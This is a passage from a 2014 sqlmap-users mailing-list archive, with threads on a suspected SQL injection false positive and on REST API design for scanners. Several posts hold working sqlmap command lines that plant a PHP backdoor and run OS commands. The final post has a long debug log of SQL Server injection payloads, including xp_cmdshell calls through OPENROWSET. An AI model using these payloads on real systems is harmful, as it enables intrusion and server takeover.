I did not read your first email, so ignore my blitherings :) On Fri, Mar 21, 2014 at 1:16 PM, Brandon Perry <bpe...@gm...>wrote: > Brian, > > I expect the program is taking the input for username and truncating it, > so ZAP sees the injection going in and a successful auth afterwards and > assumes the payload worked. I think this is a poor assumption to make. > > > On Fri, Mar 21, 2014 at 1:11 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> There is always a 302 redirect, so I am not sure how ZAP detected this as >> a SQLi. >> >> Kind regards, >> Miroslav Stampar >> >> >> On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote: >> >>> Thanks for the quick response, Miroslav and Bernardo. It's very much >>> appreciated! There is a UNION technique that is being reported by ZAP, but >>> sqlmap isn't finding it and I haven't quite figured out how to simply tell >>> it what to use explicitly. ZAP detects a UNION vulnerability on >>> activate.php: >>> >>> >>> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP" >>> >>> My attempts to input this have not been successful, so I'm not sure if >>> it's a false positive or I'm not using sqlmap quite right (more likely) . >>> >>> CMDLINE >>> sqlmap -u "http://172.16.71.138:7879/activate.php" >>> --data='act=auth-login&page=login&username=admin&password=admin' -p >>> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >>> /usr/share/webshells/php/simple-backdoor.php --file-dest >>> progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL >>> select NULL --" >>> >>> As for the previous method, here's the attached file (on screen output >>> was massive - password is "password"). End result "[09:01:51] [CRITICAL] >>> all tested parameters appear to be not injectable. Also, you can try to >>> rerun by providing either a valid value for option '--string' (or >>> '--regexp')" >>> >>> Thanks for the help! >>> >>> Brian >>> >>> >>> >>> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. < >>> ber...@gm...> wrote: >>> >>>> On 21 March 2014 11:57, Bernardo Damele A. G. < >>>> ber...@gm...> wrote: >>>> > [...] >>>> > All in all, can you please relaunch sqlmap (make sure you run git pull >>>> > first to sync to the GitHub repository) with the following syntax: >>>> >>>> Command line: >>>> >>>> python sqlmap.py -u "http://172.16.71.138:7879/index.php" >>>> --data="act=auth-login&pag=login&username=admin&password=admin" -p >>>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3 >>>> --parse-errors -t traffic.log --answers "language does the web server >>>> support=4,do you want to use for writable=2,comma separate list of >>>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y" >>>> >>>> Feel free to report back the result, the entire standard output of >>>> sqlmap and send me the traffic.log. >>>> >>>> Thank you. >>>> Bernardo >>>> >>> >>> >>> >>> ------------------------------------------------------------------------------ >>> Learn Graph Databases - Download FREE O'Reilly Book >>> "Graph Databases" is the definitive new guide to graph databases and >>> their >>> applications. Written by three acclaimed leaders in the field, >>> this first edition is now available. Download your free book today! >>> http://p.sf.net/sfu/13534_NeoTech >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Brandon P. <bpe...@gm...> - 2014-03-21 18:16:25
|
Brian, I expect the program is taking the input for username and truncating it, so ZAP sees the injection going in and a successful auth afterwards and assumes the payload worked. I think this is a poor assumption to make. On Fri, Mar 21, 2014 at 1:11 PM, Miroslav Stampar < mir...@gm...> wrote: > There is always a 302 redirect, so I am not sure how ZAP detected this as > a SQLi. > > Kind regards, > Miroslav Stampar > > > On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote: > >> Thanks for the quick response, Miroslav and Bernardo. It's very much >> appreciated! There is a UNION technique that is being reported by ZAP, but >> sqlmap isn't finding it and I haven't quite figured out how to simply tell >> it what to use explicitly. ZAP detects a UNION vulnerability on >> activate.php: >> >> >> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP" >> >> My attempts to input this have not been successful, so I'm not sure if >> it's a false positive or I'm not using sqlmap quite right (more likely) . >> >> CMDLINE >> sqlmap -u "http://172.16.71.138:7879/activate.php" >> --data='act=auth-login&page=login&username=admin&password=admin' -p >> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >> /usr/share/webshells/php/simple-backdoor.php --file-dest >> progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL >> select NULL --" >> >> As for the previous method, here's the attached file (on screen output >> was massive - password is "password"). End result "[09:01:51] [CRITICAL] >> all tested parameters appear to be not injectable. Also, you can try to >> rerun by providing either a valid value for option '--string' (or >> '--regexp')" >> >> Thanks for the help! >> >> Brian >> >> >> >> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. < >> ber...@gm...> wrote: >> >>> On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...> >>> wrote: >>> > [...] >>> > All in all, can you please relaunch sqlmap (make sure you run git pull >>> > first to sync to the GitHub repository) with the following syntax: >>> >>> Command line: >>> >>> python sqlmap.py -u "http://172.16.71.138:7879/index.php" >>> --data="act=auth-login&pag=login&username=admin&password=admin" -p >>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3 >>> --parse-errors -t traffic.log --answers "language does the web server >>> support=4,do you want to use for writable=2,comma separate list of >>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y" >>> >>> Feel free to report back the result, the entire standard output of >>> sqlmap and send me the traffic.log. >>> >>> Thank you. >>> Bernardo >>> >> >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Miroslav S. <mir...@gm...> - 2014-03-21 18:11:59
|
There is always a 302 redirect, so I am not sure how ZAP detected this as a SQLi. Kind regards, Miroslav Stampar On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote: > Thanks for the quick response, Miroslav and Bernardo. It's very much > appreciated! There is a UNION technique that is being reported by ZAP, but > sqlmap isn't finding it and I haven't quite figured out how to simply tell > it what to use explicitly. ZAP detects a UNION vulnerability on > activate.php: > > > "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP" > > My attempts to input this have not been successful, so I'm not sure if > it's a false positive or I'm not using sqlmap quite right (more likely) . > > CMDLINE > sqlmap -u "http://172.16.71.138:7879/activate.php" > --data='act=auth-login&page=login&username=admin&password=admin' -p > "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write > /usr/share/webshells/php/simple-backdoor.php --file-dest > progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL > select NULL --" > > As for the previous method, here's the attached file (on screen output was > massive - password is "password"). End result "[09:01:51] [CRITICAL] all > tested parameters appear to be not injectable. Also, you can try to rerun > by providing either a valid value for option '--string' (or '--regexp')" > > Thanks for the help! > > Brian > > > > On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. < > ber...@gm...> wrote: > >> On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...> >> wrote: >> > [...] >> > All in all, can you please relaunch sqlmap (make sure you run git pull >> > first to sync to the GitHub repository) with the following syntax: >> >> Command line: >> >> python sqlmap.py -u "http://172.16.71.138:7879/index.php" >> --data="act=auth-login&pag=login&username=admin&password=admin" -p >> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3 >> --parse-errors -t traffic.log --answers "language does the web server >> support=4,do you want to use for writable=2,comma separate list of >> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y" >> >> Feel free to report back the result, the entire standard output of >> sqlmap and send me the traffic.log. >> >> Thank you. >> Bernardo >> > > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Andres R. <and...@gm...> - 2014-03-21 17:30:27
|
Thank you so much for the comments, they are going to be very helpful when building our API :) Love to see open source projects helping themselves On Fri, Mar 21, 2014 at 9:32 AM, Bernardo Damele A. G. <ber...@gm...> wrote: > Hi Andres, > > The API is indeed "up and running for a while", but we haven't yet > properly documented yet so probably not as widely used as it could be. > > With regards to your questions: > > * Technology stack: we've decided to go with a RESTful API over > XML-RPC for simplicity of protocol, ease of definition of methods, > etc. I had researched a number of minimalistic web servers in Python > at the time and the one that was one-file only and proved to be solid > and maintained was and still is Bottle[1]. It's well documented, easy > to use and intuitive in my opinion. > > * We are happy with the technology we use and have no plans to change > it, but instead extend and maintain the API over time, check out its > source code if you're interested[2]. > > * Someone has tested it under load, the results were good, but I am > sure there is room for improvements here. > > * We have not implemented session management in the API (a front-end > would have so), instead we have the concept of tasks. A task[3] is an > object. You can create, edit, query, modify a task given the taskid. > Task ID is generated with a request to /task/new[4]. The task is a > series of independent sqlmap scans that modify the same sqlmap session > file and the data is stored in a local SQLite database. > Furthermore, when you run the sqlmappi.py, an admin ID is created. > This is the only privileged "user" and can request admin methods like > listing all tasks, deleting them, etc. > > * Recommendations: try to keep it simply, wrap all standard output and > error to a custom object that writes in a database[5] so these can be > retrieved via the API too. > > [1] http://bottlepy.org/docs/0.12/ > https://raw.githubusercontent.com/defnull/bottle/master/bottle.py > [2] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py > [3] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L91 > and https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L103 > [4] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L339 > [5] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L202 > > Good luck! > > Bernardo > > On 20 March 2014 19:05, Miroslav Stampar <mir...@gm...> wrote: >> Great reply :) >> >> Bye >> >> On Mar 20, 2014 4:13 PM, "Brandon Perry" <bpe...@gm...> wrote: >>> >>> I can't comment on building the API, but I maintain C# bindings to the >>> sqlmap REST API and, programmatically, it works really well. >>> >>> There is no authentication, but I only ever run it on localhost anyway so >>> this isn't a big deal to me. >>> >>> I have tested it under relatively heavy load (one API instance testing >>> multiple applications) and it has been performant. I don't recall ever >>> saying "Man, I wish this were faster". >>> >>> JSON is totally the way to go for data requests/responses. >>> >>> One recommendation I have since I deal with many APIs on a daily basis is >>> please don't assume the programmers will be interacting with your API with >>> language X. The Metasploit MSGPACK API is a good example of this and is very >>> cumbersome to use from a strongly typed language. Arachni falls into a >>> similar field relying on Ruby-style marshalling or YAML which I simply can't >>> do from, say, C#. >>> >>> Aside from sqlmap, I also really like the cuckoo-sandbox API. >>> >>> >>> >>> On Thu, Mar 20, 2014 at 10:00 AM, Andres Riancho >>> <and...@gm...> wrote: >>>> >>>> List, >>>> >>>> I'm going to abuse the list a little bit, and poke your brains for >>>> a while, so be prepared :) >>>> >>>> The w3af project wants to implement its own REST API to expose the >>>> w3afCore and KnowledgeBase objects. The core allows users to configure >>>> the plugins and start the scan, and the knowledge base holds the >>>> vulnerabilities. >>>> >>>> You guys implemented a REST API for sqlmap, which has been up and >>>> running for a while now. >>>> >>>> What I wanted to know is: >>>> * What's the technology stack you guys used for creating the REST >>>> API? >>>> * Were you happy with it? Would you use something different if >>>> you had the chance? >>>> * Have you tested the API under heavy load? >>>> * Do you have the concept of sessions and users in the API? Why >>>> not? >>>> * Any recommendations on API design? (paths, results, hrefs, >>>> etc.) >>>> >>>> Thanks! >>>> >>>> Regards, >>>> -- >>>> Andrés Riancho >>>> Project Leader at w3af - http://w3af.org/ >>>> Web Application Attack and Audit Framework >>>> Twitter: @w3af >>>> GPG: 0x93C344F3 >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> Learn Graph Databases - Download FREE O'Reilly Book >>>> "Graph Databases" is the definitive new guide to graph databases and >>>> their >>>> applications. Written by three acclaimed leaders in the field, >>>> this first edition is now available. Download your free book today! >>>> http://p.sf.net/sfu/13534_NeoTech >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >>> >>> ------------------------------------------------------------------------------ >>> Learn Graph Databases - Download FREE O'Reilly Book >>> "Graph Databases" is the definitive new guide to graph databases and their >>> applications. Written by three acclaimed leaders in the field, >>> this first edition is now available. Download your free book today! >>> http://p.sf.net/sfu/13534_NeoTech >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 |
|
From: Bernardo D. A. G. <ber...@gm...> - 2014-03-21 12:32:43
|
Hi Andres, The API is indeed "up and running for a while", but we haven't yet properly documented yet so probably not as widely used as it could be. With regards to your questions: * Technology stack: we've decided to go with a RESTful API over XML-RPC for simplicity of protocol, ease of definition of methods, etc. I had researched a number of minimalistic web servers in Python at the time and the one that was one-file only and proved to be solid and maintained was and still is Bottle[1]. It's well documented, easy to use and intuitive in my opinion. * We are happy with the technology we use and have no plans to change it, but instead extend and maintain the API over time, check out its source code if you're interested[2]. * Someone has tested it under load, the results were good, but I am sure there is room for improvements here. * We have not implemented session management in the API (a front-end would have so), instead we have the concept of tasks. A task[3] is an object. You can create, edit, query, modify a task given the taskid. Task ID is generated with a request to /task/new[4]. The task is a series of independent sqlmap scans that modify the same sqlmap session file and the data is stored in a local SQLite database. Furthermore, when you run the sqlmappi.py, an admin ID is created. This is the only privileged "user" and can request admin methods like listing all tasks, deleting them, etc. * Recommendations: try to keep it simply, wrap all standard output and error to a custom object that writes in a database[5] so these can be retrieved via the API too. [1] http://bottlepy.org/docs/0.12/ https://raw.githubusercontent.com/defnull/bottle/master/bottle.py [2] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py [3] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L91 and https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L103 [4] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L339 [5] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L202 Good luck! Bernardo On 20 March 2014 19:05, Miroslav Stampar <mir...@gm...> wrote: > Great reply :) > > Bye > > On Mar 20, 2014 4:13 PM, "Brandon Perry" <bpe...@gm...> wrote: >> >> I can't comment on building the API, but I maintain C# bindings to the >> sqlmap REST API and, programmatically, it works really well. >> >> There is no authentication, but I only ever run it on localhost anyway so >> this isn't a big deal to me. >> >> I have tested it under relatively heavy load (one API instance testing >> multiple applications) and it has been performant. I don't recall ever >> saying "Man, I wish this were faster". >> >> JSON is totally the way to go for data requests/responses. >> >> One recommendation I have since I deal with many APIs on a daily basis is >> please don't assume the programmers will be interacting with your API with >> language X. The Metasploit MSGPACK API is a good example of this and is very >> cumbersome to use from a strongly typed language. Arachni falls into a >> similar field relying on Ruby-style marshalling or YAML which I simply can't >> do from, say, C#. >> >> Aside from sqlmap, I also really like the cuckoo-sandbox API. >> >> >> >> On Thu, Mar 20, 2014 at 10:00 AM, Andres Riancho >> <and...@gm...> wrote: >>> >>> List, >>> >>> I'm going to abuse the list a little bit, and poke your brains for >>> a while, so be prepared :) >>> >>> The w3af project wants to implement its own REST API to expose the >>> w3afCore and KnowledgeBase objects. The core allows users to configure >>> the plugins and start the scan, and the knowledge base holds the >>> vulnerabilities. >>> >>> You guys implemented a REST API for sqlmap, which has been up and >>> running for a while now. >>> >>> What I wanted to know is: >>> * What's the technology stack you guys used for creating the REST >>> API? >>> * Were you happy with it? Would you use something different if >>> you had the chance? >>> * Have you tested the API under heavy load? >>> * Do you have the concept of sessions and users in the API? Why >>> not? >>> * Any recommendations on API design? (paths, results, hrefs, >>> etc.) >>> >>> Thanks! >>> >>> Regards, >>> -- >>> Andrés Riancho >>> Project Leader at w3af - http://w3af.org/ >>> Web Application Attack and Audit Framework >>> Twitter: @w3af >>> GPG: 0x93C344F3 >>> >>> >>> ------------------------------------------------------------------------------ >>> Learn Graph Databases - Download FREE O'Reilly Book >>> "Graph Databases" is the definitive new guide to graph databases and >>> their >>> applications. Written by three acclaimed leaders in the field, >>> this first edition is now available. Download your free book today! >>> http://p.sf.net/sfu/13534_NeoTech >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
|
From: Bernardo D. A. G. <ber...@gm...> - 2014-03-21 12:12:51
|
Hi Daniel,
There's no need to provide the --sql-file, sqlmap will use the file
itself as part of the internal logic when --dbms-cred is provided.
However, OPENROWSET on Microsoft SQL Server 2005+ by default is not
executable by non DBA users or users that haven't been specifically
granted permission to that builtin function so it is unlikely that the
unprivileged session user will be able to execute it.
I see what you're trying to do, but vertical privilege escalation to
DBA via OPENROWSET works with default settings on Microsoft SQL Server
2000 and previous versions only.
According to the parsed DBMS error messages, the session user indeed
is no DBA hence no command execution.
Bernardo
On 21 March 2014 08:09, Daniel Shapira <don...@gm...> wrote:
> hey,
> i am trying to write on mssql with either os-shell or any other flag (non
> works for me)
> i know that 'Ad Hoc Distributed Queries are disabled -> OpenRowSet is
> disabled as well
> sqlmap initially gets into the db as a secondary user, there are 2 users in
> the db, SA which is the administrator and the other user which sqlmap gets
> at start
> the password for sa is NULL - no password at all, i know that by executing
> --users --passwords
> so with all this data i am trying to run:
> sqlmap -u "target" --risk=5 --level=5 --random-agent --threads=10 -o
> --os-shell --dbms-cred=sa: --fresh-queries -v3 --parse-errors -t traffic.txt
> --sql-file=/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql
> i also tried without the sql-file as i guess sqlmap should try it by itself
> but i get the same results
> so my guess is the sqlmap can't get into the 'sa' user because if it could
> get in, it would enable the openrowset. am i right?
> i can send the traffic.txt privately
> **********************
>
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: keyword
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: keyword=f') AND 1202=1202 AND ('NhGb' LIKE 'NhGb
> Vector: AND [INFERENCE]
>
> Type: error-based
> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
> clause
> Payload: keyword=f') AND 7343=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
> (7343=7343) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('PGJx' LIKE
> 'PGJx
> Vector: AND [RANDNUM]=CONVERT(INT,(SELECT
> '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
>
> Type: stacked queries
> Title: Microsoft SQL Server/Sybase stacked queries
> Payload: keyword=f'); WAITFOR DELAY '0:0:5'--
> Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>
> Type: AND/OR time-based blind
> Title: Microsoft SQL Server/Sybase time-based blind
> Payload: keyword=f') WAITFOR DELAY '0:0:5'--
> Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
> ---
> [03:57:43] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2008 R2 or 7
> web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
> back-end DBMS: Microsoft SQL Server 2008
> [03:57:43] [INFO] executing SQL statements from given file(s)
> [03:57:43] [ERROR] unresolved variable 'ENABLE' in SQL file
> '/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql'
> do you want to provide the substitution values? [y/N] y
> insert value for variable 'ENABLE': 1
> [03:57:46] [DEBUG] executing SQL data execution query: 'EXEC
> master..sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;
> EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE WITH
> OVERRIDE; EXEC sp_configure 'show advanced options', 0; RECONFIGURE WITH
> OVERRIDE'
> [03:57:46] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options',
> 1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed
> Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced
> options', 0; RECONFIGURE WITH OVERRIDE--
> [03:57:46] [WARNING] time-based comparison requires larger statistical
> model, please wait..............................
> [03:57:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:57:53] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:57:53] [DEBUG] done
> EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE WITH
> OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1;
> RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;
> RECONFIGURE WITH OVERRIDE: 'NULL'
> [03:57:53] [DEBUG] going to use D:/Microsoft SQL
> Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log as temporary files directory
> on Microsoft SQL Server 2005 and 2008, OPENROWSET function is disabled by
> default. This function is needed to execute statements as another DBMS user
> since you provided the option '--dbms-creds'. If you are DBA, you can enable
> it. Do you want to enable it? [Y/n] Y
> [03:59:06] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options',
> 1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed
> Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced
> options', 0; RECONFIGURE WITH OVERRIDE--
> [03:59:06] [WARNING] it is very important not to stress the network adapter
> during usage of time-based payloads to prevent potential errors
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:06] [INFO] testing if current user is DBA
> [03:59:06] [PAYLOAD] f') AND 7808=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
> (IS_SRVROLEMEMBER(CHAR(115)+CHAR(121)+CHAR(115)+CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110))=1)
> THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('FSjT' LIKE
> 'FSjT
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: Conversion failed when converting the
> varchar value 'qsgjq0qywuq' to data type int.'
> [03:59:06] [DEBUG] performed 1 queries in 0.13 seconds
> [03:59:06] [WARNING] functionality requested probably does not work because
> the curent session user is not a database administrator
> [03:59:06] [DEBUG] creating a support table to write commands standard
> output to
> [03:59:06] [PAYLOAD] f');DROP TABLE sqlmapoutput--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:06] [PAYLOAD] f');CREATE TABLE sqlmapoutput(id INT PRIMARY KEY
> IDENTITY, data NVARCHAR(4000))--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:06] [INFO] testing if xp_cmdshell extended procedure is usable
> [03:59:06] [PAYLOAD] f');SELECT * FROM
> OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @ktdg
> VARCHAR(8000);SET
> @ktdg=0x6563686f2031203e2022443a2f4d6963726f736f66742053514c205365727665722f4d5353514c31305f35302e4d5353514c5345525645522f4d5353514c2f4c6f672f746d70636f6974652e74787422;EXEC
> master..xp_cmdshell @ktdg')--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT
> 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries'
> because this component is turned off as part of the security configuration
> for this server. A system administrator can enable the use of 'Ad Hoc
> Distributed Queries' by using sp_configure. For more information about
> enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in
> SQL Server Books Online.'
> [03:59:06] [PAYLOAD] f');BULK INSERT sqlmapoutput FROM 'D:/Microsoft SQL
> Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpcoite.txt' WITH (CODEPAGE='RAW',
> FIELDTERMINATOR='WaPrHIHUBH', ROWTERMINATOR='vOTmRkjwAa')--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: You do not have permission to use the
> bulk load statement.'
> [03:59:06] [PAYLOAD] f');SELECT * FROM
> OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @wgiw
> VARCHAR(8000);SET
> @wgiw=0x64656c202f46202f5120443a5c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70636f6974652e747874;EXEC
> master..xp_cmdshell @wgiw')--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:07] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT
> 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries'
> because this component is turned off as part of the security configuration
> for this server. A system administrator can enable the use of 'Ad Hoc
> Distributed Queries' by using sp_configure. For more information about
> enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in
> SQL Server Books Online.'
> [03:59:07] [PAYLOAD] f') AND 9097=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT
> ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32)) FROM
> sqlmapoutput)+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND
> ('tzMl' LIKE 'tzMl
> [03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:07] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: Conversion failed when converting the
> nvarchar value 'qsgjq0qywuq' to data type int.'
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
